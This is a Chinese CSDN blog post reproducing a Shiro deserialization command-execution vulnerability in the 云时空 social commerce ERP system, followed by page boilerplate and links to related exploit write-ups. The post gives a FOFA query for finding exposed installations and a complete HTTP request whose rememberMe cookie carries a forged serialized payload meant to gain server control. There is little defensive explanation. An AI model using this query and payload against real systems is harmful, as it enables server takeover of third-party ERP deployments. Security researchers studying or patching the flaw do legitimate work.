【漏洞复现】云时空社会化商业ERP系统命令执行漏洞

最新推荐文章于 2024-08-09 11:17:49 发布
最新推荐文章于 2024-08-09 11:17:49 发布
阅读量91 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/138164741
版权
【漏洞复现】 专栏收录该内容
146 篇文章 1 订阅

已下架不支持订阅

漏洞描述:

云时空社会化商业ERP系统存在Shiro命令执行漏洞,攻击者可以通过此漏洞获取服务器权限。

搜索语法:

Fofa-Query: app="云时空社会化商业ERP系统"

漏洞详情:

1.云时空社会化商业ERP系统。

2.漏洞POC:

GET /static/js/public.js HTTP/1.1
Host: {
  {Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close
Cookie: rememberMe=ZkQwQ0NGMEY4ZDhhZjRkQk1PeiBePyZcAaJE7Om+C0hA3jDtN5dVqFAyh+gGxrjM3fdJJFsrOhEOImJ3fCkQTtim1uKYvYhbi2OI/9Kg1Pw8TBrKecFPuI9P8+bEBA2Gin4ksL6+CVrasvh4M+tdwhYyRKyOzqjnszwltyit+VmMzH+gY6SGBYXRDH9NQ7EoRBiSh4uSkPVkj9iIG8eebwjjwoXtR+YapiLcdLhNL/j1/tEVA/yIi84iEWeJQw68POhP
了解本专栏 已下架不支持订阅
晚风不及你ღ
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录

已下架不支持订阅

时空社会化商业 ERP 系统 Shiro 反序列化漏洞复现
0xSec
11-29 921
时空社会化商业 ERP 系统存在 shiro 反序列化漏洞,该漏洞源于软件存在硬编码的 shiro-key,攻击者可利用该 key 生成恶意的序列化数据,在服务器上执行任意代码,执行系统命令、或打入内存马等,获取服务器权限。
漏洞复现时空社会化商业ERP系统slogin SQL注入漏洞
晚风不及你
04-24 122
时空社会化商业ERP系统slogin存在SQL注入漏洞,攻击者可以通过此漏洞获取数据库敏感信息。
时空社会化商业ERP系统任意文件上传漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
12-20 473
时空商业ERP以大型集团供应链系统为支撑,是基于互联网技术的多渠道模式营销服务管理体系,可以整合线上和线下交易模式,覆盖企业经营管理应用各个方面。有效掌控全流程情况,敏捷捕捉消费者需求,快速响应市场变化,规避经营风险,以市场为导向,优化部署营销资源,协同产销、供应与服务,帮助您的企业构建敏捷的经营管理平台,还能通过互联网、人工智能等创新模式,整合流通企业上下游产业链资源,协助您共享数字服务,提升企业数字化管控效率。
时空社会化商业ERP系统 user/online 身份认证绕过漏洞复现
0xSec
08-06 222
时空社会化商业ERP系统 user/online 接口存在身份认证绕过漏洞,未授权的攻击者可利用漏洞url获取在线用户sessionid 导致用户信息泄露,并且切换网站session后可直接接管后,造成信息泄露或恶意破坏,使系统处于极不安全状态。
漏洞复现】 Shiro 反序列化漏洞
zkaqlaoniao的博客
11-09 3017
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。该款工具特别适合初学者,配置了各种OA漏洞利用板块,还有shiro、struts2等框架漏洞漏洞利用板块,还有一键执行命令的功能!!
时空社会化商业 ERP 系统 service SQL 注入漏洞复现
0xSec
11-30 984
时空社会化商业ERP service接口处存在SQL注入漏洞,未授权的攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息),甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
ERP 管理软件系统存在任意文件读取漏洞
weixin_68647219的博客
08-01 3821
ERP 管理软件系统任意文件读取高危漏洞,该漏洞是由于对用户查看或下载的文件不做限制,可能导致读取配置信息甚至系统重要文件。严重的话,就可能导致SSRF,进而漫游至内网。
ERP系统进销存标准版
06-20
ERP系统进销存标准版
ERP系统信息化资料:AFAB执行折旧运行.doc
09-29
ERP系统信息化资料:AFAB执行折旧运行.doc
生产企业WMS功能需求
09-01
本次项目为新建三层中心仓库,一楼包含物料装卸码头装卸区、输送线、Z型 提升机、拆剁机器人、2个冷库、CL玻璃原材仓、2个其他异形件原材仓、办公区等;二楼包含原材仓智能货架、原材仓 2 层普通货架(栈板存放);三楼全部 为成品仓 2层普通货架(栈板存放);一、二楼之间采用输送线+Z型提升机进行物料存取输送,栈板物料通过一、二、三楼之间的提升机进行物料输送。
服装企业ERP系统信息化管理方案.doc
11-13
服装企业ERP系统信息化管理方案.doc
企业信息化ERP系统的构成.pptx
04-26
企业信息化ERP系统的构成
服装企业ERP系统信息化管理方案样本.doc
12-06
服装企业ERP系统信息化管理方案样本.doc
VS本地,一言难尽的ERP
勇往直前的专栏
11-16 1748
——24K纯的ERP就站在这里,一眼望去,满眼都是传统本地的影子。 不知何时,厂商有组织、有目的、有预谋地通过结合流行词“”将老产品或服务重新命名这样“洗白”(Cloud-Washing)的行径成为了一种业内的潜规则。以时下流行的ERP为例,其实很多所谓的ERP实质内核还是传统本地ERP, 更有甚者连ERP都不是。 企业被“”这一词语所吸引,直到部署和运行起来,才发觉此非彼...
《密码编码学与网络安全原理与实践》第九章 第十章 公钥密码学与密钥管理
最新发布
m0_57291352的博客
08-09 894
原则上不能说传统密码优于公钥密码,也不能说公钥密码优于传统密码公钥密码学仅限于用在密钥管理和签名这类应用中与密钥分配中心的会话过程既不比传统密码中的那些过程更简单,也不比之更有效动机:简化密钥分配和管理、实现签名等功能不对称性是公钥最为重要的性质,可以用来保证“真实”性,“不可否认”性非对称密钥:两个密钥:公钥和私钥,用来实现互补运算,即加密和解密,或者生成签名与验证签名;公钥证书:认证机构将用户的姓名和公钥绑定在一起,用户用自己的私钥对数字文件签名后,可以通过证书识别签名者,因为签名者是唯一拥有与证书上对
【网络安全】本地文件包含及远程文件包含漏洞详解
goldfish8848的博客
08-05 900
开发人员将需要重复调用的函数写入一个文件,对该文件进行包含时产生的操作。这样编写代码能减少冗余,降低代码后期维护难度。保证网站整体风格统一:导航栏、底部footer栏等,把这些不会变的东西包含在一个文件中,可以保证整体效果的统一和代码量的减少。
网络安全入门教程(非常详细)从零基础入门到精通!
2301_77160226的博客
08-05 1168
网络安全领域犹如一座深邃的知识宝库,从零基础入门到精通是一段充满挑战但也充满收获的旅程。这不仅需要您对知识的不懈追求,更需要大量的实践与经验积累。希望本教程能够为您的网络安全学习之路点亮明灯,引领您在这个充满机遇与挑战的领域中稳步前行,最终成为一名优秀的网络安全专家,为构建安全的网络世界贡献自己的力量!
【网络安全】探索AI 聊天机器人工作流程实现RCE
等风来
08-06 215
我发现了一个广泛使用的AI聊天机器人平台中的远程代码执行漏洞。该漏洞存在于聊天机器人的自定义工作流响应代码中,这些工作流允许开发人员通过创建定制的流程来扩展机器人的功能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值